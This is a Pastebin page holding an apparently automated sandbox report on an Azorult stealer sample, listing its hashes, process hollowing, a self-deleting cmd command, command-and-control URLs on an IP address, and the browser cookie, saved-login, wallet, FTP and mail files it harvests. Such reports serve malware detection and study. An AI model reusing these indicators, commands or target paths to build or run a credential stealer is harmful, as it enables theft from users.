Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * ID: 1167
- * MalFamily: "Azorult"
- * MalScore: 10.0
- * File Name: "AZORult_2c5d4881d9b5ac60e71e03d033f0dbdf.exe"
- * File Size: 663552
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "f6590e0972571e2c0dde9810f5aa3af78a9813190a13561e195566fb88823a0d"
- * MD5: "2c5d4881d9b5ac60e71e03d033f0dbdf"
- * SHA1: "7d90e9fd7831c8b09f0587b78f6a261e19653170"
- * SHA512: "1f171f1cb6ab875e3d51adf101afdb3e231cde1be6a827359eb7b2d580b171f67c4dd035bf38f6b7a5629ae1c4da3cce5aa9c435bf6257b5af7f0c3e0480b175"
- * CRC32: "65F3CC4F"
- * SSDEEP: "6144:f0ZnddVyNen7hcaYkY2PW71CUBK/f6YTk7PoTRcV6V7kgY9fvVBVBR5jrLCuS0oK:sN8kKdcs6cBDL6D+Vf2DMf"
- * Process Execution:
- "nUlIMci5lDcC.exe",
- "nUlIMci5lDcC.exe",
- "cmd.exe",
- "timeout.exe",
- "services.exe",
- "lsass.exe"
- * Executed Commands:
- "\"C:\\Users\\user\\AppData\\Local\\Temp\\nUlIMci5lDcC.exe\"",
- "\"C:\\Windows\\system32\\cmd.exe\" /c C:\\Windows\\system32\\timeout.exe 3 & del \"nUlIMci5lDcC.exe\"",
- "C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\system32\\timeout.exe 3 & del \"nUlIMci5lDcC.exe\"",
- "C:\\Windows\\system32\\lsass.exe",
- "C:\\Windows\\system32\\timeout.exe 3"
- * Signatures Detected:
- "Description": "Behavioural detection: Executable code extraction",
- "Details":
- "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
- "Details":
- "Description": "Anomalous file deletion behavior detected (10+)",
- "Details":
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\11276781929694657456500.tmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\113282348866933851038344.tmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\113282962236379443929750.tmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\113283287057947681352380.tmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\nUlIMci5lDcC.exe"
- "Description": "Performs HTTP requests potentially not found in PCAP.",
- "Details":
- "url_ioc": "45.76.87.43:80//index.php"
- "url_ioc": "45.76.87.43:80//index.php"
- "url_ioc": "45.76.87.43:80//update.exe"
- "Description": "A process created a hidden window",
- "Details":
- "Process": "nUlIMci5lDcC.exe -> C:\\Windows\\System32\\cmd.exe"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- "suspicious_request_iocs": "http://45.76.87.43/index.php"
- "suspicious_request_iocs": "http://45.76.87.43/update.exe"
- "Description": "Performs some HTTP requests",
- "Details":
- "url_iocs": "http://45.76.87.43/index.php"
- "url_iocs": "http://45.76.87.43/update.exe"
- "Description": "Uses Windows utilities for basic functionality",
- "Details":
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /c C:\\Windows\\system32\\timeout.exe 3 & del \"nUlIMci5lDcC.exe\""
- "command": "C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\system32\\timeout.exe 3 & del \"nUlIMci5lDcC.exe\""
- "Description": "Behavioural detection: Injection (Process Hollowing)",
- "Details":
- "Injection": "nUlIMci5lDcC.exe(3676) -> nUlIMci5lDcC.exe(1992)"
- "Description": "Executed a process and injected code into it, probably while unpacking",
- "Details":
- "Injection": "nUlIMci5lDcC.exe(3676) -> nUlIMci5lDcC.exe(1992)"
- "Description": "Deletes its original binary from disk",
- "Details":
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 4910208 times"
- "Description": "Steals private information from local Internet browsers",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@doubleclick1.txt"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@advertising1.txt"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.bing2.txt"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@media2.txt"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.google1.txt"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google5.txt"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google4.txt"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google3.txt"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google1.txt"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.msn2.txt"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@msn1.txt"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.msn2.txt"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@3lift1.txt"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@bing2.txt"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@scorecardresearch2.txt"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@atwola2.txt"
- "Description": "Collects information about installed applications",
- "Details":
- "Program": "Google Update Helper"
- "Program": "Microsoft Excel MUI 2013"
- "Program": "Microsoft Outlook MUI 2013"
- "Program": "Google Chrome"
- "Program": "Adobe Flash Player 29 NPAPI"
- "Program": "Adobe Flash Player 29 ActiveX"
- "Program": "Microsoft DCF MUI 2013"
- "Program": "Microsoft Access MUI 2013"
- "Program": "Microsoft Office Proofing Tools 2013 - English"
- "Program": "Adobe Acrobat Reader DC"
- "Program": "Microsoft Publisher MUI 2013"
- "Program": "Microsoft Office Shared MUI 2013"
- "Program": "Microsoft Office OSM MUI 2013"
- "Program": "Microsoft InfoPath MUI 2013"
- "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
- "Program": "Outils de v\\xc3\\xa9rification linguistique 2013 de Microsoft Office\\xc2\\xa0- Fran\\xc3\\xa7ais"
- "Program": "Microsoft Word MUI 2013"
- "Program": "Microsoft OneDrive"
- "Program": "Microsoft Groove MUI 2013"
- "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xc3\\xb1ol"
- "Program": "Microsoft Access Setup Metadata MUI 2013"
- "Program": "Microsoft Office OSM UX MUI 2013"
- "Program": "Java Auto Updater"
- "Program": "Microsoft PowerPoint MUI 2013"
- "Program": "Microsoft Office Professional Plus 2013"
- "Program": "Adobe Refresh Manager"
- "Program": "Microsoft Office Proofing 2013"
- "Program": "Microsoft Lync MUI 2013"
- "Program": "Microsoft OneNote MUI 2013"
- "Description": "CAPE detected the Azorult malware family",
- "Details":
- "Description": "File has been identified by 15 Antiviruses on VirusTotal as malicious",
- "Details":
- "McAfee": "Fareit-FPT!2C5D4881D9B5"
- "Cylance": "Unsafe"
- "F-Prot": "W32/VBKrypt.SQ.gen!Eldorado"
- "ESET-NOD32": "a variant of Win32/GenKryptik.DSDK"
- "APEX": "Malicious"
- "Endgame": "malicious (high confidence)"
- "Invincea": "heuristic"
- "McAfee-GW-Edition": "BehavesLike.Win32.Fareit.jh"
- "Sophos": "Mal/FareitVB-N"
- "SentinelOne": "DFI - Malicious PE"
- "Cyren": "W32/VBKrypt.SQ.gen!Eldorado"
- "Microsoft": "Trojan:Win32/Wacatac.B!ml"
- "AhnLab-V3": "Trojan/Win32.Inject.R290159"
- "Acronis": "suspicious"
- "Qihoo-360": "HEUR/QVM03.0.ADF7.Malware.Gen"
- "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
- "Details":
- "Description": "Attempts to access Bitcoin/ALTCoin wallets",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\Sun\\wallets\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Adobe\\wallets\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Adobe\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Notepad++\\wallets\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Sun\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\wallets\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\wallets\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Identities\\wallets\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\wallets\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Macromedia\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Macromedia\\wallets\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Notepad++\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Identities\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\*"
- "Description": "Harvests credentials from local FTP client softwares",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\filezilla\\recentservers.xml"
- "Description": "Harvests information related to installed instant messenger clients",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
- "Description": "Harvests information related to installed mail clients",
- "Details":
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
- "Description": "Collects information to fingerprint the system",
- "Details":
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET TROJAN Suspicious POST with Common Windows Process Names - Possible Process List Exfiltration"
- "Description": "Uses suspicious command line tools or Windows utilities",
- "Details":
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /c C:\\Windows\\system32\\timeout.exe 3 & del \"nUlIMci5lDcC.exe\""
- "command": "C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\system32\\timeout.exe 3 & del \"nUlIMci5lDcC.exe\""
- * Started Service:
- "VaultSvc"
- * Mutexes:
- "A81FB8C60-BBE6E186-FC9B5DB5-36DA4559-33946726"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\11276781929694657456500.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\113282348866933851038344.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\113282962236379443929750.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\113283287057947681352380.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\update.exe"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\11276781929694657456500.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\113282348866933851038344.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\113282962236379443929750.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\113283287057947681352380.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll",
